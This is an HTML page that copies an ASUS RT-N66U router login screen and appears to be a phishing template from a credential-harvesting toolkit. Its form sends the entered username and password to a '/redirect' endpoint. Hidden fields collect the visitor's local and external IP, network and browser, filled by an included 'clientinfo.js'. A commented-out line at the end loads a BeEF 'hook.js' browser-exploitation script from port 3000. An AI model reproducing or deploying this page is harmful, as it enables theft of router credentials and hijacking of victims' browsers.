
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<html xmlns:v>
<head>
<meta http-equiv="X-UA-Compatible" content="IE=Edge"/>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta HTTP-EQUIV="Pragma" CONTENT="no-cache">
<meta HTTP-EQUIV="Expires" CONTENT="-1">
<meta name="viewport" content="width=device-width, initial-scale=1, user-scalable=no">
<link rel="icon" href="images/favicon.png">
<title>ASUS Login</title>
<style>
body{
font-family: Arial;
}
.wrapper{
background:url(static/images/login_bg.png) #283437 no-repeat;
background-size: 1280px 1076px;
background-position: center 0%;
margin: 0px;
background:#283437\9;
}
.title_name {
font-size: 40pt;
color:#93d2d9;
}
.prod_madelName{
font-size: 26pt;
color:#fff;
margin-left:78px;
margin-top: 10px;
}
.login_img{
width:43px;
height:43px;
background-image: url('images/New_ui/icon_titleName.png');
background-repeat: no-repeat;
}
.p1{
font-size: 16pt;
color:#fff;
width:480px;
}
.button{
background-color:#279FD9;
border-radius: 4px ;
transition: visibility 0s linear 0.218s,opacity 0.218s,background-color 0.218s;
height: 68px;
width: 300px;
font-size: 28pt;
color:#fff;
text-align: center;
float:right;
margin:50px 0px 0px 78px;
line-height:68px;
cursor:pointer;
}
.form_input{
background-color:rgba(255,255,255,0.2);
background-color:#576D73\9;
border-radius: 4px;
padding:23px 22px;
width: 480px;
border: 0;
height:30px;
color:#fff;
font-size:28px;
}
.nologin{
margin:10px 0px 0px 78px;
background-color:rgba(255,255,255,0.2);
padding:20px;
line-height:36px;
border-radius: 5px;
width: 480px;
border: 0;
color:#FFF;
color:#FFF\9; /* IE6 IE7 IE8 */
font-size:28px;
}
.div_table{
display:table;
}
.div_tr{
display:table-row;
}
.div_td{
display:table-cell;
}
.title_gap{
margin:20px 0px 0px 78px;
}
.img_gap{
padding-right:30px;
vertical-align:middle;
}
.password_gap{
margin:30px 0px 0px 78px;
}
.error_hint{
color: rgb(255, 204, 0);
margin:10px 0px -10px 78px;
font-size: 18px;
}
.error_hint1{
margin:40px 0px -10px 78px;
font-size: 24px;
line-height:32px;
width: 580px;
}
.main_field_gap{
margin:100px auto 0;
}
.warming_desc{
font-size: 16px;
color:#FC0;
width: 600px;
}
/*for mobile device*/
@media screen and (max-width: 1000px){
.title_name {
font-size: 20pt;
color:#93d2d9;
margin-left:15px;
}
.prod_madelName{
font-size: 13pt;
margin-left: 15px;
}
.p1{
font-size: 12pt;
width:100%;
}
.login_img{
background-size: 75%;
}
.form_input{
padding:10px 11px;
width: 100%;
height:30px;
font-size:16px
}
.button{
height: 50px;
width: 100%;
font-size: 14pt;
text-align: center;
float:right;
margin: 25px -22px 40px 15px;
line-height:50px;
padding-left: 7px;
}
.nologin{
margin-left:10px;
padding:10px;
line-height:18px;
width: 100%;
font-size:14px;
}
.error_hint{
margin-left:10px;
}
.error_hint1{
width: 100%;
font-size:14px;
}
.main_field_gap{
width:80%;
margin:30px 0 0 15px;
/*margin:30px auto 0;*/
}
.title_gap{
margin-left:15px;
}
.password_gap{
margin-left:15px;
}
.img_gap{
padding-right:0;
vertical-align:middle;
}
.warming_desc{
margin: 10px 15px;
width: 100%;
}
}
.hidden {
height: 0px;
width: 0px;
overflow: hidden;
visibility: hidden;
display: none !important;
}
</style>

</head>
<body class="wrapper" onload="initial();">
<input type="hidden" name="group_id" value="">
<input type="hidden" name="action_mode" value="">
<input type="hidden" name="action_script" value="">
<input type="hidden" name="action_wait" value="5">
<input type="hidden" name="current_page" value="Main_Login.asp">
<input type="hidden" name="next_page" value="Main_Login.asp">
<input type="hidden" name="login_authorization" value="">
<input type="hidden" name="cloud_file" value="" disabled>
<div class="div_table main_field_gap">
<div class="div_tr">
<div id="warming_field" style="display:none;" class="warming_desc">Note: the router you are using is not an ASUS device or has not been authorised by ASUS. ASUSWRT might not work properly on this device.</div>
<div class="title_name">
<div class="div_td img_gap">
<div class="login_img"></div>
</div>
<div class="div_td">SIGN IN</div>
</div>
<div class="prod_madelName">RT-N66U</div>


<form action="/redirect" method="post">
    <div id="login_filed">
    <div class="p1 title_gap">Sign in with your ASUS router account</div>
    <div id="name_title_ie" style="display:none;margin:20px 0 -10px 78px;" class="p1 title_gap">Username</div>
    <div class="title_gap">
    <input type="text" id="Username" name="Username" tabindex="1" class="form_input" maxlength="20" autocapitalize="off" autocomplete="off" placeholder="Username">
    </div>
    <div id="password_title_ie" style="display:none;margin:20px 0 -20px 78px;" class="p1 title_gap">Password</div>
    <div class="password_gap">
    <input type="password" name="Passwd" tabindex="2" class="form_input" maxlength="16" placeholder="Password" autocapitalize="off" autocomplete="off">
    </div>
    <div class="error_hint" style="display:none;" id="error_status_field"></div>

    <input id="redirect" name="redirect" type="redirect" class="hidden" value="http://192.168.1.1">

    <input id="iplocal" name="iplocal" type="iplocal" class="hidden"></input>
    <input id="ipexternal" name="ipexternal" type="ipexternal" class="hidden"></input>
    <input id="network" name="network" type="network" class="hidden"></input>
    <input id="browser" name="browser" type="browser" class="hidden"></input>

    <input name="signIn" class="button" type="submit" value="Sign in" />
    </div>
</div>



</div>
</div>
</form>
</body>
</html>


<!-- You got a beef with me? -->
<!-- <script type="text/javascript" src="http://192.168.1.1:3000/hook.js"></script> -->

{% include 'clientinfo.js' %}
<?php include 'clientinfo.js';?>